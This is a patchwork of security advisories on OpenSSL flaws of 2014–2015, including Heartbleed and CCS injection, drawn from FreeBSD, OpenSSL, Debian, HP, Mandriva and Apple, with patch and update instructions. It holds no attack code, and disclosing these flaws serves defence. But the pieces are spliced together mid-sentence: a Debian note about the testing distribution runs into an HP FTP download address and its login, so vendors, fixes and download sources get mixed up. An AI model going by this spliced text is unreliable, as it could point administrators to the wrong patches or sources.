http://security.FreeBSD.org/patches/SA-14:06/openssl.patch.asc\n# gpg --verify openssl.patch.asc\n\n[FreeBSD 10.0]\n# fetch http://security.FreeBSD.org/patches/SA-14:06/openssl-10.patch\n# fetch http://security.FreeBSD.org/patches/SA-14:06/openssl-10.patch.asc\n# gpg --verify openssl-10.patch.asc\n\nb) Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nRecompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:http://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart all deamons using the library, or reboot the system. \n\n3) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nIMPORTANT: the update procedure above does not update OpenSSL from the\nPorts Collection or from a package, known as security/openssl, which\nhas to be updated separately via ports or package. \n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/8/ r264285\nreleng/8.3/ r264284\nreleng/8.4/ r264284\nstable/9/ r264285\nreleng/9.1/ r264284\nreleng/9.2/ r264284\nstable/10/ r264266\nreleng/10.0/ r264267\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:http://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. References\n\n\u003cURL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076\u003e\n\u003cURL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\u003e\n\n\u003cURL:http://www.openssl.org/news/secadv_20140407.txt\u003e\n\u003cURL:http://eprint.iacr.org/2014/140.pdf\u003e\n\nThe latest revision of this advisory is available at\n\u003cURL:http://security.FreeBSD.org/advisories/FreeBSD-SA-14:06.openssl.asc\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v2.0.22 (FreeBSD)\n\niQIcBAEBCgAGBQJTRJySAAoJEO1n7NZdz2rnzPcQALd6So7vDRBaYiaGwQjc55oI\nQwTnNzkkgxVTGwi8lDV6h8bIW3Ga8AhMGoZCVOeKbDABBDghVYe6Na5e/wsHbPPu\ntXmDRhoi2aV0sVCTFfpoCNJ8l2lb+5vnmEC6Oi3PMQDbRC+Ptg15o0W/2hXw0eKO\nyu4BhS4dl6lX7IvlR1n4sr0rfa8vwxe5OpUUd6Bzw0SUBmV+BTzq1C70FuOZ/hnD\nThaZS8Ox3fcWuPylhPbhxnWqg0oVNkBpiRYpIBadrpl9EiRRzbTfF+uFvauR9tBN\n1mK8lLwd7DK6x8iCSnDd2ZlN1rNn8EPsGohT4vP+szz2E2YP1x8ugihEBdYax+Dh\nZ4TWkm3/wJwEf00G32E1hZ8F+UavE8AmnGVk6gxiRpnv2sdNJYRlWd9O8u251qMq\nuzcmBX6Jr14dQCwlqof8pYKYV7VCE/Cu4JHThOCL042CLwUmXyJVMFzm6WPQlNjC\ndlPbSG+PXjninPjcYBoMR+863X35Guv0pJBNG/ofEh+Jy5MveaMRQX/mA+wy29zm\nqg74lM07adXkJujPAuA5dYjZivpW1NPOHeIjaYjaI6KDw2q3BlkGa2C3PeYDQxn4\nIqujqpem5nyQY4BO2XC8gVtuym0jDSA98bgFXumNDkmzlUUuOFOWD8YScLopOzOu\nEpUXgezogk1Rd3EVsaJ+\n=UBO0\n-----END PGP SIGNATURE-----\n. OpenSSL Security Advisory [05 Jun 2014]\n========================================\n\nSSL/TLS MITM vulnerability (CVE-2014-0224)\n===========================================\n\nAn attacker using a carefully crafted handshake can force the use of weak\nkeying material in OpenSSL SSL/TLS clients and servers. This can be exploited\nby a Man-in-the-middle (MITM) attack where the attacker can decrypt and \nmodify traffic from the attacked client and server. \n\nThe attack can only be performed between a vulnerable client *and*\nserver. OpenSSL clients are vulnerable in all versions of OpenSSL. Servers\nare only known to be vulnerable in OpenSSL 1.0.1 and 1.0.2-beta1. Users\nof OpenSSL servers earlier than 1.0.1 are advised to upgrade as a precaution. \n\nOpenSSL 0.9.8 SSL/TLS users (client and/or server) should upgrade to 0.9.8za. \nOpenSSL 1.0.0 SSL/TLS users (client and/or server) should upgrade to 1.0.0m. \nOpenSSL 1.0.1 SSL/TLS users (client and/or server) should upgrade to 1.0.1h. \n\nThanks to KIKUCHI Masashi (Lepidum Co. Ltd.) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 1st May\n2014 via JPCERT/CC. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team partly based\non an original patch from KIKUCHI Masashi. \n\nDTLS recursion flaw (CVE-2014-0221)\n====================================\n\nBy sending an invalid DTLS handshake to an OpenSSL DTLS client the code\ncan be made to recurse eventually crashing in a DoS attack. \n\nOnly applications using OpenSSL as a DTLS client are affected. \n\nOpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za\nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h. \n\nThanks to Imre Rad (Search-Lab Ltd.) for discovering this issue. This\nissue was reported to OpenSSL on 9th May 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\nDTLS invalid fragment vulnerability (CVE-2014-0195)\n====================================================\n\nA buffer overrun attack can be triggered by sending invalid DTLS fragments\nto an OpenSSL DTLS client or server. This is potentially exploitable to\nrun arbitrary code on a vulnerable client or server. \n\nOnly applications using OpenSSL as a DTLS client or server affected. \n\nOpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za\nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h. \n\nThanks to J\u00fcri Aedla for reporting this issue. This issue was\nreported to OpenSSL on 23rd April 2014 via HP ZDI. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\nSSL_MODE_RELEASE_BUFFERS NULL pointer dereference (CVE-2014-0198)\n=================================================================\n\nA flaw in the do_ssl3_write function can allow remote attackers to\ncause a denial of service via a NULL pointer dereference. This flaw\nonly affects OpenSSL 1.0.0 and 1.0.1 where SSL_MODE_RELEASE_BUFFERS is\nenabled, which is not the default and not common. \n\nOpenSSL 1.0.0 users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 users should upgrade to 1.0.1h. \n\nThis issue was reported in public. The fix was developed by\nMatt Caswell of the OpenSSL development team. \n\nSSL_MODE_RELEASE_BUFFERS session injection or denial of service (CVE-2010-5298)\n===============================================================================\n \nA race condition in the ssl3_read_bytes function can allow remote\nattackers to inject data across sessions or cause a denial of service. \nThis flaw only affects multithreaded applications using OpenSSL 1.0.0\nand 1.0.1, where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the\ndefault and not common. \n\nOpenSSL 1.0.0 users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 users should upgrade to 1.0.1h. \n\nThis issue was reported in public. \n\nAnonymous ECDH denial of service (CVE-2014-3470)\n================================================\n\nOpenSSL TLS clients enabling anonymous ECDH ciphersuites are subject to a\ndenial of service attack. \n\nOpenSSL 0.9.8 users should upgrade to 0.9.8za\nOpenSSL 1.0.0 users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 users should upgrade to 1.0.1h. \n\nThanks to Felix Gr\u00f6bert and Ivan Fratri\u0107 at Google for discovering this\nissue. This issue was reported to OpenSSL on 28th May 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\nOther issues\n============\n\nOpenSSL 1.0.0m and OpenSSL 0.9.8za also contain a fix for\nCVE-2014-0076: Fix for the attack described in the paper \"Recovering\nOpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack\"\nReported by Yuval Yarom and Naomi Benger. This issue was previously\nfixed in OpenSSL 1.0.1g. \n\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttp://www.openssl.org/news/secadv_20140605.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. The following\nCommon Vulnerabilities and Exposures project ids identify them:\n\nCVE-2010-5298\n\n A read buffer can be freed even when it still contains data that is\nused later on, leading to a use-after-free. \n\nCVE-2014-0076\n\n ECDSA nonces can be recovered through the Yarom/Benger FLUSH+RELOAD\ncache side-channel attack. \n\nA third issue, with no CVE id, is the missing detection of the\n\"critical\" flag for the TSA extended key usage under certain cases. \n\n\nAdditionally, this update checks for more services that might need to\nbe restarted after upgrades of libssl, corrects the detection of\napache2 and postgresql, and adds support for the\n\u0027libraries/restart-without-asking\u0027 debconf configuration. This allows\nservices to be restarted on upgrade without prompting. \n\n\nThe oldstable distribution (squeeze) is not affected by CVE-2010-5298\nand it might be updated at a later time to address the remaining\nvulnerabilities. \n\nFor the testing distribution (jessie), these problems will be fixed\nsoon. The\nupdates are available from the following location using ftp:\n\nftp://srt03046:Secure12@ftp.usa.hp.com\n\nUser name: srt03046\nPassword: Secure12 ( NOTE: Case sensitive)\n\nHP-UX Release\n HP-UX OpenSSL version\n\nB.11.11 (11i v1)\n A.00.09.08za.001_HP-UX_B.11.11_32+64.depot\n\nB.11.23 (11i v2)\n A.00.09.08za.002_HP-UX_B.11.23_IA-PA.depot\n\nB.11.31 (11i v3)\n A.00.09.08za.003_HP-UX_B.11.31_IA-PA.depot\n\nMANUAL ACTIONS: Yes - Update\n\nInstall OpenSSL A.00.09.08za or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n \n The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before\n 1.0.1g do not properly handle Heartbeat Extension packets, which allows\n remote attackers to obtain sensitive information from process memory\n via crafted packets that trigger a buffer over-read, as demonstrated\n by reading private keys, related to d1_both.c and t1_lib.c, aka the\n Heartbleed bug (CVE-2014-0160). \n \n The dtls1_reassemble_fragment function in d1_both.c in OpenSSL\n before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does\n not properly validate fragment lengths in DTLS ClientHello messages,\n which allows remote attackers to execute arbitrary code or cause a\n denial of service (buffer overflow and application crash) via a long\n non-initial fragment (CVE-2014-0195). \n \n OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before\n 1.0.1h does not properly restrict processing of ChangeCipherSpec\n messages, which allows man-in-the-middle attackers to trigger use of a\n zero-length master key in certain OpenSSL-to-OpenSSL communications,\n and consequently hijack sessions or obtain sensitive information,\n via a crafted TLS handshake, aka the CCS Injection vulnerability\n (CVE-2014-0224). \n \n The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other\n products, uses nondeterministic CBC padding, which makes it easier\n for man-in-the-middle attackers to obtain cleartext data via a\n padding-oracle attack, aka the POODLE issue (CVE-2014-3566). \n \n The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before\n 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square\n of a BIGNUM value, which might make it easier for remote attackers to\n defeat cryptographic protection mechanisms via unspecified vectors,\n related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and\n crypto/bn/bn_asm.c (CVE-2014-3570). \n \n The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before\n 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote\n SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger\n a loss of forward secrecy by omitting the ServerKeyExchange message\n (CVE-2014-3572). \n \n OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k\n does not enforce certain constraints on certificate data, which allows\n remote attackers to defeat a fingerprint-based certificate-blacklist\n protection mechanism by including crafted data within a\n certificate\u0026#039;s unsigned portion, related to crypto/asn1/a_verify.c,\n crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c\n (CVE-2014-8275). \n \n The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before\n 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL\n servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate\n brute-force decryption by offering a weak ephemeral RSA key in a\n noncompliant role, related to the FREAK issue. NOTE: the scope of\n this CVE is only client code based on OpenSSL, not EXPORT_RSA issues\n associated with servers or other TLS implementations (CVE-2015-0204). \n \n The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before\n 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a\n Diffie-Hellman (DH) certificate without requiring a CertificateVerify\n message, which allows remote attackers to obtain access without\n knowledge of a private key via crafted TLS Handshake Protocol traffic\n to a server that recognizes a Certification Authority with DH support\n (CVE-2015-0205). \n \n Use-after-free vulnerability in the d2i_ECPrivateKey function in\n crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r,\n 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote\n attackers to cause a denial of service (memory corruption and\n application crash) or possibly have unspecified other impact via a\n malformed Elliptic Curve (EC) private-key file that is improperly\n handled during import (CVE-2015-0209). \n \n The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before\n 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not\n properly handle a lack of outer ContentInfo, which allows attackers to\n cause a denial of service (NULL pointer dereference and application\n crash) by leveraging an application that processes arbitrary PKCS#7\n data and providing malformed data with ASN.1 encoding, related to\n crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289). \n \n The updated packages have been upgraded to the 1.0.1m version where\n these security flaws has been fixed. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293\n http://openssl.org/news/secadv_20150108.txt\n http://openssl.org/news/secadv_20150319.txt\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 2/X86_64:\n 324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm\n 9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm\n 58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm\n b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm\n a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm \n 521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. \n\nHP Systems Insight Manager v7.3 Hotfix kit\nHP Systems Insight Manager v7.2 Hotfix kit (The HP Systems Insight Manager\nv7.2 Hotfix kit is currently unavailable, but will be released at a later\ndate. \n\nhttp://h18013.www1.hp.com/products/servers/management/hpsim/download.html\n\nNOTE: No reboot of the system is required after applying the HP SIM Hotfix\nkit. \nHP System Management Homepage versions 7.3.2 and earlier for Linux and\nWindows. HP System Management Homepage v7.2.4.1 is available for\nWindows 2003 only. \n\nHP System Management Homepage v7.2.4.1 for Windows x86:\nhttp://www.hp.com/swpublishing/MTX-d775367b0a28449ca05660778b\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p11160892/v98702\n\nHP System Management Homepage v7.2.4.1 for Windows x64:\nhttp://www.hp.com/swpublishing/MTX-3a7aa5e233904ebe847a5e1555\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p221526337/v98704\n\nHP System Management Homepage v7.3.3.1 for Windows x86:\nhttp://www.hp.com/swpublishing/MTX-3395d737d98f42149125b9bb05\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p11160892/v98696\n\nHP System Management Homepage v7.3.3.1 for Windows x64:\nhttp://www.hp.com/swpublishing/MTX-e8076c2a35804685ad65b2b1ba\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p221526337/v98698\n\nHP System Management Homepage v7.3.3.1 for Linux x86:\nhttp://www.hp.com/swpublishing/MTX-511c3e0b2f6f4f6bbc796fc619\nftp://ftp.hp.com/pub/softlib2/software1/pubsw-linux/p1980463820/v98694\n\nHP System Management Homepage v7.3.3.1 for Linux x64:\nhttp://www.hp.com/swpublishing/MTX-bd9a1cf60e344c549c4888db93\nftp://ftp.hp.com/pub/softlib2/software1/pubsw-linux/p1507410135/v98693\n\nNOTE: HP System Management Homepage v7.3.3.1 for Linux x86 still contains\nOpenSSL v1.0.0d. As long as all other products which SMH V7.3.3.1 for Linux\nx86 communicates with have been upgraded to the latest versions, it will not\nbe vulnerable to the exploits described in CVE-2014-0224. \n\nRelease Date: 2014-07-23\nLast Updated: 2014-07-23\n\nPotential Security Impact: Remote denial of service (DoS), code execution,\nunauthorized access, disclosure of information\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP Insight\nControl server migration running on Linux and Windows which could be\nexploited remotely resulting in denial of service (DoS), code execution,\nunauthorized access, or disclosure of information. \n\nReferences:\n\nCVE-2010-5298 Remote Denial of Service\nCVE-2014-0076 Unauthorized Disclosure of Information\nCVE-2014-0195 Remote Unauthorized Access\nCVE-2014-0198 Remote Denial of Service\nCVE-2014-0221 Remote Denial of Service (DoS)\nCVE-2014-0224 Remote Unauthorized Access or Disclosure of Information\nCVE-2014-3470 Remote Code Execution or Unauthorized Access\nSSRT101647\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Insight Control server migration v7.2.2, v7.3, v7.3.1, and v7.3.2\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2010-5298 (AV:N/AC:H/Au:N/C:N/I:P/A:P) 4.0\nCVE-2014-0076 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-0195 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-0198 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0221 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0224 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-3470 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following updates to v7.3.2 of HP Insight Control server\nmigration to resolve these vulnerabilities by upgrading to version 7.3.3. \nPlease note that version 7.3.3 of HP Insight Control server migration is\nincluded on the HP Insight Management 7.3 Update 2 DVD. \n\nHP has provided the installation binaries for download from the following web\nsite by using the Receive for free option:\n\nhttp://h18013.www1.hp.com/products/servers/management/fpdownload.html\n\nCustomers using HP Insight Control server migration v7.2.2 must first upgrade\nfrom v7.2.2 to v7.3 by using the HP Insight Management v7.3 DVD, and then\nupgrade to v7.3.3 by using the HP Insight Management v7.3 Update 2 DVD. \n\nCustomers running HP Insight Control server migration v7.3, v7.3.1, or\nv7.3.2, can use the HP Insight Control server migration v7.3 Update 2 DVD to\ncomplete the upgrade. \n\nFor more information on the upgrade process, please refer to the HP Insight\nManagement Installation and Upgrade Guide and Release notes, which are\navailable at the following location:\n\nhttp://h17007.www1.hp.com/us/en/enterprise/servers/solutions/info-library/ind\nex.aspx?cat=insightmanagement\n\nNOTE: The upgrade paths described above update the entire HP Insight Control\nsoftware stack. To upgrade HP Insight Control server migration only, complete\nthe following steps:\n\nCopy \"hpsmp.exe\" to the local machine from the HP Insight Management v7.3.0\nUpdate 2 DVD ISO. Create batch file with the following commands:\n@echo off\nhpsmp.exe /verysilent /SVCPATCH=Install_Through_Patch\nCopy the batch file to the folder where \"hpsmp.exe\" normally resides on the\ntarget system. \nDouble click on the batch file. \nThe HP Insight Control server migration installation starts in a command\nprompt. \nThe command prompt closes when the installation finishes. \nAfter the installation completes it creates a log file (ICmigr.log) and an\noutput file (ICmigroutput.xml) on the target system. \nDo not close or click on the command prompt while the process is completing. \nDo not run the command prompt in the background. \n\nHISTORY\nVersion:1 (rev.1) - 23 July 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nAPPLE-SA-2014-09-17-3 OS X Mavericks 10.9.5 and Security Update\n2014-004\n\nOS X Mavericks 10.9.5 and Security Update 2014-004 are now available\nand address the following:\n\napache_mod_php\nAvailable for: OS X Mavericks 10.9 to 10.9.4\nImpact: Multiple vulnerabilities in PHP 5.4.24\nDescription: Multiple vulnerabilities existed in PHP 5.4.24, the\nmost serious of which may have led to arbitrary code execution. This\nupdate addresses the issues by updating PHP to version 5.4.30\nCVE-ID\nCVE-2013-7345\nCVE-2014-0185\nCVE-2014-0207\nCVE-2014-0237\nCVE-2014-0238\nCVE-2014-1943\nCVE-2014-2270\nCVE-2014-3478\nCVE-2014-3479\nCVE-2014-3480\nCVE-2014-3487\nCVE-2014-3515\nCVE-2014-3981\nCVE-2014-4049\n\nBluetooth\nAvailable for: OS X Mavericks 10.9 to 10.9.4\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A validation issue existed in the handling of a\nBluetooth API call. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2014-4390 : Ian Beer of Google Project Zero\n\nCoreGraphics\nAvailable for: OS X Mavericks 10.9 to 10.9.4\nImpact: Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or an information disclosure\nDescription: An out of bounds memory read existed in the handling of\nPDF files. This issue was addressed through improved bounds checking. \nCVE-ID\nCVE-2014-4378 : Felipe Andres Manzano of Binamuse VRT working with\nthe iSIGHT Partners GVP Program\n\nCoreGraphics\nAvailable for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,\nOS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4\nImpact: Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: An integer overflow existed in the handling of PDF\nfiles. This issue was addressed through improved bounds checking. \nCVE-ID\nCVE-2014-4377 : Felipe Andres Manzano of Binamuse VRT working with\nthe iSIGHT Partners GVP Program\n\nFoundation\nAvailable for: OS X Mavericks 10.9 to 10.9.4\nImpact: An application using NSXMLParser may be misused to disclose\ninformation\nDescription: An XML External Entity issue existed in NSXMLParser\u0027s\nhandling of XML. This issue was addressed by not loading external\nentities across origins. \nCVE-ID\nCVE-2014-4374 : George Gal of VSR (http://www.vsecurity.com/)\n\nIntel Graphics Driver\nAvailable for: OS X Mountain Lion v10.8.5,\nOS X Mavericks 10.9 to 10.9.4\nImpact: Compiling untrusted GLSL shaders may lead to an unexpected\napplication termination or arbitrary code execution\nDescription: A user-space buffer overflow existed in the shader\ncompiler. This issue was addressed through improved bounds checking. \nCVE-ID\nCVE-2014-4393 : Apple\n\nIntel Graphics Driver\nAvailable for: OS X Mountain Lion v10.8.5,\nOS X Mavericks 10.9 to 10.9.4\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: Multiple validation issues existed in some integrated\ngraphics driver routines. These issues were addressed through\nimproved bounds checking. \nCVE-ID\nCVE-2014-4394 : Ian Beer of Google Project Zero\nCVE-2014-4395 : Ian Beer of Google Project Zero\nCVE-2014-4396 : Ian Beer of Google Project Zero\nCVE-2014-4397 : Ian Beer of Google Project Zero\nCVE-2014-4398 : Ian Beer of Google Project Zero\nCVE-2014-4399 : Ian Beer of Google Project Zero\nCVE-2014-4400 : Ian Beer of Google Project Zero\nCVE-2014-4401 : Ian Beer of Google Project Zero\nCVE-2014-4416 : Ian Beer of Google Project Zero\n\nIOAcceleratorFamily\nAvailable for: OS X Mountain Lion v10.8.5,\nOS X Mavericks 10.9 to 10.9.4\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A null pointer dereference existed in the handling of\nIOKit API arguments. This issue was addressed through improved\nvalidation of IOKit API arguments. \nCVE-ID\nCVE-2014-4376 : Ian Beer of Google Project Zero\n\nIOAcceleratorFamily\nAvailable for: OS X Mavericks 10.9 to 10.9.4\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: An out-of-bounds read issue existed in the handling of\nan IOAcceleratorFamily function. This issue was addressed through\nimproved bounds checking. \nCVE-ID\nCVE-2014-4402 : Ian Beer of Google Project Zero\n\nIOHIDFamily\nAvailable for: OS X Mountain Lion v10.8.5,\nOS X Mavericks 10.9 to 10.9.4\nImpact: A local user can read kernel pointers, which can be used to\nbypass kernel address space layout randomization\nDescription: An out-of-bounds read issue existed in the handling of\nan IOHIDFamily function. This issue was addressed through improved\nbounds checking. \nCVE-ID\nCVE-2014-4379 : Ian Beer of Google Project Zero\n\nIOKit\nAvailable for: OS X Mountain Lion v10.8.5,\nOS X Mavericks 10.9 to 10.9.4\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A validation issue existed in the handling of certain\nmetadata fields of IODataQueue objects. This issue was addressed\nthrough improved validation of metadata. \nCVE-ID\nCVE-2014-4388 : @PanguTeam\n\nIOKit\nAvailable for: OS X Mountain Lion v10.8.5,\nOS X Mavericks 10.9 to 10.9.4\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: An integer overflow existed in the handling of IOKit\nfunctions. This issue was addressed through improved bounds checking. \nCVE-ID\nCVE-2014-4389 : Ian Beer of Google Project Zero\n\nKernel\nAvailable for: OS X Mavericks 10.9 to 10.9.4\nImpact: A local user can infer kernel addresses and bypass kernel\naddress space layout randomization\nDescription: In some cases, the CPU Global 